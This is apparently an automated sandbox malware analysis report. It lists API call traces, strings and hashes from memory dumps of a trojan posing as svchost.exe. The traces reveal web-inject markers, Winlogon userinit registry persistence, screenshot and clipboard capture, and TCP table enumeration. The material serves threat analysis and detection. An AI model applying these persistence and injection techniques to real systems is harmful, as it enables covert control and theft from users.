                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DirectoryErrorFileLastPath$AdminAllocAttributesBackslashCreateCurrentFolderMakeModuleNameSystemUserVirtuallstrcpyn
                                                                                                                                                                                                              • String ID: 8A99A277$\$path.txt$rfk.zip
                                                                                                                                                                                                              • API String ID: 3351314726-816171664
                                                                                                                                                                                                              • Opcode ID: c9b0ece63cff02f421de9281cf0a698b3443cb1e7d3fe6c96311bc01430ae740
                                                                                                                                                                                                              • Instruction ID: ae2a405275712cc9459418b4318942cd6546adef0749ca46369f097044144a0a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c9b0ece63cff02f421de9281cf0a698b3443cb1e7d3fe6c96311bc01430ae740
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE61F43090064A6FEB258B249CACBFB7BE9AF45304F544694E9C6D7240DFB19988CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0268FB20,00000000,00000000,00000000,?,02651A39), ref: 02651330
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000020,?,02651A39), ref: 02651398
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,02651A39), ref: 0265139F
                                                                                                                                                                                                              • strstr.MSVCRT ref: 0265141F
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02651439
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02651453
                                                                                                                                                                                                              • strstr.MSVCRT ref: 0265146D
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02651497
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000020), ref: 026514B4
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 026514BB
                                                                                                                                                                                                              • strstr.MSVCRT ref: 026515E4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0265161C
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0265161F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0265162C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0265162F
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0268FB20,?,02651A39), ref: 0265163A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$strstr$Process$AllocCriticalSection$EnterFreeLeaveValidate
                                                                                                                                                                                                              • String ID: data_after$data_before$data_end$data_inject$set_url
                                                                                                                                                                                                              • API String ID: 2387113551-2328515424
                                                                                                                                                                                                              • Opcode ID: c3a2e0b045d3a65d0a1f256a0b95c6cf01b79999d9125761bf7bf0ba36ed3a20
                                                                                                                                                                                                              • Instruction ID: f6c68dc09e22b2a44aeb56779d769c113fbfd670b48957c1e62172a6ddc7603e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c3a2e0b045d3a65d0a1f256a0b95c6cf01b79999d9125761bf7bf0ba36ed3a20
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3BA1CE74900351AFDB21CF24C9987AA7FE1AF46344F1886ADDC8A8B701EB72D645CB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 0264DF80: GetDesktopWindow.USER32 ref: 0264DF8E
                                                                                                                                                                                                                • Part of subcall function 0264DF80: RealChildWindowFromPoint.USER32(00000000,?,0264E016,?,0264A857,?,76F930D0,?), ref: 0264DF95
                                                                                                                                                                                                                • Part of subcall function 0264DF80: IsWindowVisible.USER32(00000000), ref: 0264DFC1
                                                                                                                                                                                                                • Part of subcall function 0264DF80: GetParent.USER32(00000000), ref: 0264DFC8
                                                                                                                                                                                                                • Part of subcall function 0264DF80: GetWindowLongA.USER32(00000000,000000EC), ref: 0264DFD3
                                                                                                                                                                                                                • Part of subcall function 0264DF80: WindowFromPoint.USER32(76F930D0,?,?,0264E016,?,0264A857,?,76F930D0,?), ref: 0264DFE8
                                                                                                                                                                                                              • RealChildWindowFromPoint.USER32(00000000,?,0264A857,?,0264A857,?,76F930D0,?), ref: 0264E037
                                                                                                                                                                                                              • SendMessageTimeoutA.USER32(00000000,00000084,00000000,0264A857,00000002,00000064,?), ref: 0264E05D
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0264E081
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 0264E092
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 0264E09D
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 0264E0BB
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 0264E0C6
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0264A857), ref: 0264E0D2
                                                                                                                                                                                                              • GetAncestor.USER32(00000000,00000002), ref: 0264E0E6
                                                                                                                                                                                                              • GetWindowInfo.USER32(?,?), ref: 0264E129
                                                                                                                                                                                                              • PtInRect.USER32(?,?,0264A857), ref: 0264E154
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 0264E174
                                                                                                                                                                                                              • SendMessageTimeoutA.USER32(00000000,00000084,00000000,0264A857,00000002,00000064,000000FF), ref: 0264E1A3
                                                                                                                                                                                                              • MapWindowPoints.USER32(00000000,?,00000000,00000001), ref: 0264E1D0
                                                                                                                                                                                                              • RealChildWindowFromPoint.USER32(?,00000000,?), ref: 0264E1DB
                                                                                                                                                                                                              • MapWindowPoints.USER32(?,00000000,00000000,00000001), ref: 0264E1F7
                                                                                                                                                                                                              • RealChildWindowFromPoint.USER32(00000000,00000000,?), ref: 0264E202
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Long$FromPoint$ChildReal$MessagePointsSendTimeout$AncestorDesktopInfoMutexObjectParentRectReleaseSingleVisibleWait
                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                              • API String ID: 1846550538-4251816714
                                                                                                                                                                                                              • Opcode ID: 8efcf4e335bd1112f357d9178b218ce29aa8a3af00d2f99917e031fa7f25bca0
                                                                                                                                                                                                              • Instruction ID: ce6a05b44186ffe1230e98ec0114510016a8cacb5f903b5d0628a195a70fa706
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8efcf4e335bd1112f357d9178b218ce29aa8a3af00d2f99917e031fa7f25bca0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9061AE75A40215BBDB20DE58DC84EBF77A9EB89721F504609FD61A3380DB71EC51CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D098), ref: 02663920
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02663961
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0266396B
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02663973
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02663984
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0266398B
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 026639BF
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 026639CC
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 02663A10
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02663A2C
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02663A49
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DirectoryErrorFileLastPath$AdminAllocAttributesBackslashCreateCurrentFolderMakeModuleNameSystemUserVirtuallstrcpyn
                                                                                                                                                                                                              • String ID: \$path.txt$stf.zip
                                                                                                                                                                                                              • API String ID: 3351314726-487659054
                                                                                                                                                                                                              • Opcode ID: 763a70d4b8a8d08b9f2908d78e9bc9ebcc2910bb883581216d2c453cb8243c41
                                                                                                                                                                                                              • Instruction ID: 77f26a9e7487b7fd229692803226d75ec4a1d3aeb40314e2244ad6c574046b18
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 763a70d4b8a8d08b9f2908d78e9bc9ebcc2910bb883581216d2c453cb8243c41
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB61F1309006496FDB25DB249CACBFE7BA8AF45700F5446D8E9CAD7340EF719998CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0265323D
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0265325E
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0265327F
                                                                                                                                                                                                              • GetGUIThreadInfo.USER32(00000000), ref: 02653286
                                                                                                                                                                                                              • GetOpenClipboardWindow.USER32 ref: 0265329C
                                                                                                                                                                                                              • GetActiveWindow.USER32 ref: 026532AA
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,00000000,000000FF,?,?,?,?), ref: 026532D8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000013), ref: 026532FA
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02653301
                                                                                                                                                                                                              • memset.MSVCRT ref: 02653311
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 0265332E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0265337B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0265337E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0265338B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0265338E
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 02653399
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 026533DF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$GlobalProcess$ByteCharMultiThreadUnlockWideWindowmemset$ActiveAllocClipboardCurrentFreeInfoLockOpenValidate
                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                              • API String ID: 3472172748-4108050209
                                                                                                                                                                                                              • Opcode ID: c7f8fbd7e7c01e9aa153dacbf6b7f9a7c472557bb786db4477cbf217981149c8
                                                                                                                                                                                                              • Instruction ID: 07965821ccb2fdce2f94b44edbc29c807a6e1beb4b7bc314faaab39cdadab6ed
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c7f8fbd7e7c01e9aa153dacbf6b7f9a7c472557bb786db4477cbf217981149c8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D641F332604361ABD7209F64DC8CF6B7BA8EF85B94F050B58FD85D7380DF60D62486A6
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                              • memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401264
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00401B44,00000000,00000000), ref: 00401275
                                                                                                                                                                                                              • IsBadWritePtr.KERNEL32(?,00000004), ref: 00401285
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHeap$Process$Handle$AllocCloseCreateFreeInformationLockPointerReadSizeUnlockValidateWritememset
                                                                                                                                                                                                              • String ID: G,@
                                                                                                                                                                                                              • API String ID: 132362422-3313068137
                                                                                                                                                                                                              • Opcode ID: c87fe8c59a66a8ba2057550360fc396b9d9c5c1a7bae7684166c86d3e9f90a93
                                                                                                                                                                                                              • Instruction ID: a7140257f329b7de85cf1082c2828f4b6f45ca3281c26892c76bebf1ae027e6a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c87fe8c59a66a8ba2057550360fc396b9d9c5c1a7bae7684166c86d3e9f90a93
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C4167B1A00214BBEB109F959D89FAFBB7CEF84B11F10416AFB05F62D0D77459448BA8
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A7A5), ref: 0265F2F7
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 0265F33B
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0265F347
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0265F34B
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0265F35C
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0265F363
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 0265F390
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 0265F39F
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0265F3A5
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0265F3A9
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0265F3BA
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0265F3C1
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 0265F3EF
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 0265F405
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser$Sleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$8A99A7A5$scrs
                                                                                                                                                                                                              • API String ID: 1455050916-1123714631
                                                                                                                                                                                                              • Opcode ID: 0d0aa2205919d11ce6b601c1cfc741e47a48d20d72931ae23595dca0da84ac36
                                                                                                                                                                                                              • Instruction ID: 018765827606bb54fcdd99952a0da9c3ae88fcdb1859aaa64721982ff45aa40a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d0aa2205919d11ce6b601c1cfc741e47a48d20d72931ae23595dca0da84ac36
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91312D319443286BDB10DB749C58BEE7BE8BF56700F855999E986D3200EFB0D9C4CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe,76F930D0,00000000), ref: 02664A43
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000103,?,76DC0180), ref: 02664A6D
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,userinit,00000000,00000000,00000000,00000000), ref: 02664A8D
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,userinit,00000000,00000000,00000000,00000000), ref: 02664ABA
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,C:\Windows\apppatch\svchost.exe), ref: 02664ABE
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,00000000,00000002), ref: 02664B60
                                                                                                                                                                                                                • Part of subcall function 026541B0: GetProcessHeap.KERNEL32(00000000,00000000,6F9690B0,02650C69), ref: 026541BE
                                                                                                                                                                                                                • Part of subcall function 026541B0: HeapValidate.KERNEL32(00000000), ref: 026541C1
                                                                                                                                                                                                                • Part of subcall function 026541B0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 026541CE
                                                                                                                                                                                                                • Part of subcall function 026541B0: RtlFreeHeap.NTDLL(00000000), ref: 026541D1
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(?), ref: 02664B71
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02664B7B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Value$ProcessQuery$CloseExistsFileFlushFreeOpenPathValidate
                                                                                                                                                                                                              • String ID: C:\Windows\apppatch\svchost.exe$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                              • API String ID: 579956326-2103896814
                                                                                                                                                                                                              • Opcode ID: 866f36868d75d7e90afc43e8fa9c73e18ca5e97866db3168226620d3c3e6470b
                                                                                                                                                                                                              • Instruction ID: 2a7a1b09ebc63b7880da1006169c04cf3874d628a4ebfe95a3dbd5c70e3952e3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 866f36868d75d7e90afc43e8fa9c73e18ca5e97866db3168226620d3c3e6470b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A51E639640246BFEB309B64DC98FFEB7B9EF85704F104684E942AB304DB719A15C790
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A5C5), ref: 02661347
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02661389
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02661395
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02661399
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 026613AA
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 026613B1
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 026613E2
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 026613E8
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 026613EC
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 026613FD
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02661404
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02661432
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 02661448
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$8A99A5C5$scrs
                                                                                                                                                                                                              • API String ID: 224938940-2537590803
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a2c5), ref: 026623B7
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 026623F9
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02662405
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02662409
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0266241A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02662421
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02662452
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02662458
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0266245C
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0266246D
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02662474
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 026624A2
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 026624B8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$8a99a2c5$scrs
                                                                                                                                                                                                              • API String ID: 224938940-3371760077
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A277), ref: 026630A7
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 026630E9
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 026630F5
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 026630F9
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0266310A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02663111
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02663142
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02663148
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0266314C
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0266315D
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02663164
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02663192
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 026631A8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$8A99A277$scrs
                                                                                                                                                                                                              • API String ID: 224938940-3362442297
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000C10,76F93050,76F930D0,76F93080), ref: 026550B7
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 026550BA
                                                                                                                                                                                                              • memset.MSVCRT ref: 026550CE
                                                                                                                                                                                                              • inet_addr.WS2_32(?), ref: 026550F5
                                                                                                                                                                                                              • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02655113
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0265511D
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02655120
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0265512D
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02655130
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000C13), ref: 02655148
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0265514F
                                                                                                                                                                                                              • memset.MSVCRT ref: 0265515F
                                                                                                                                                                                                              • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02655175
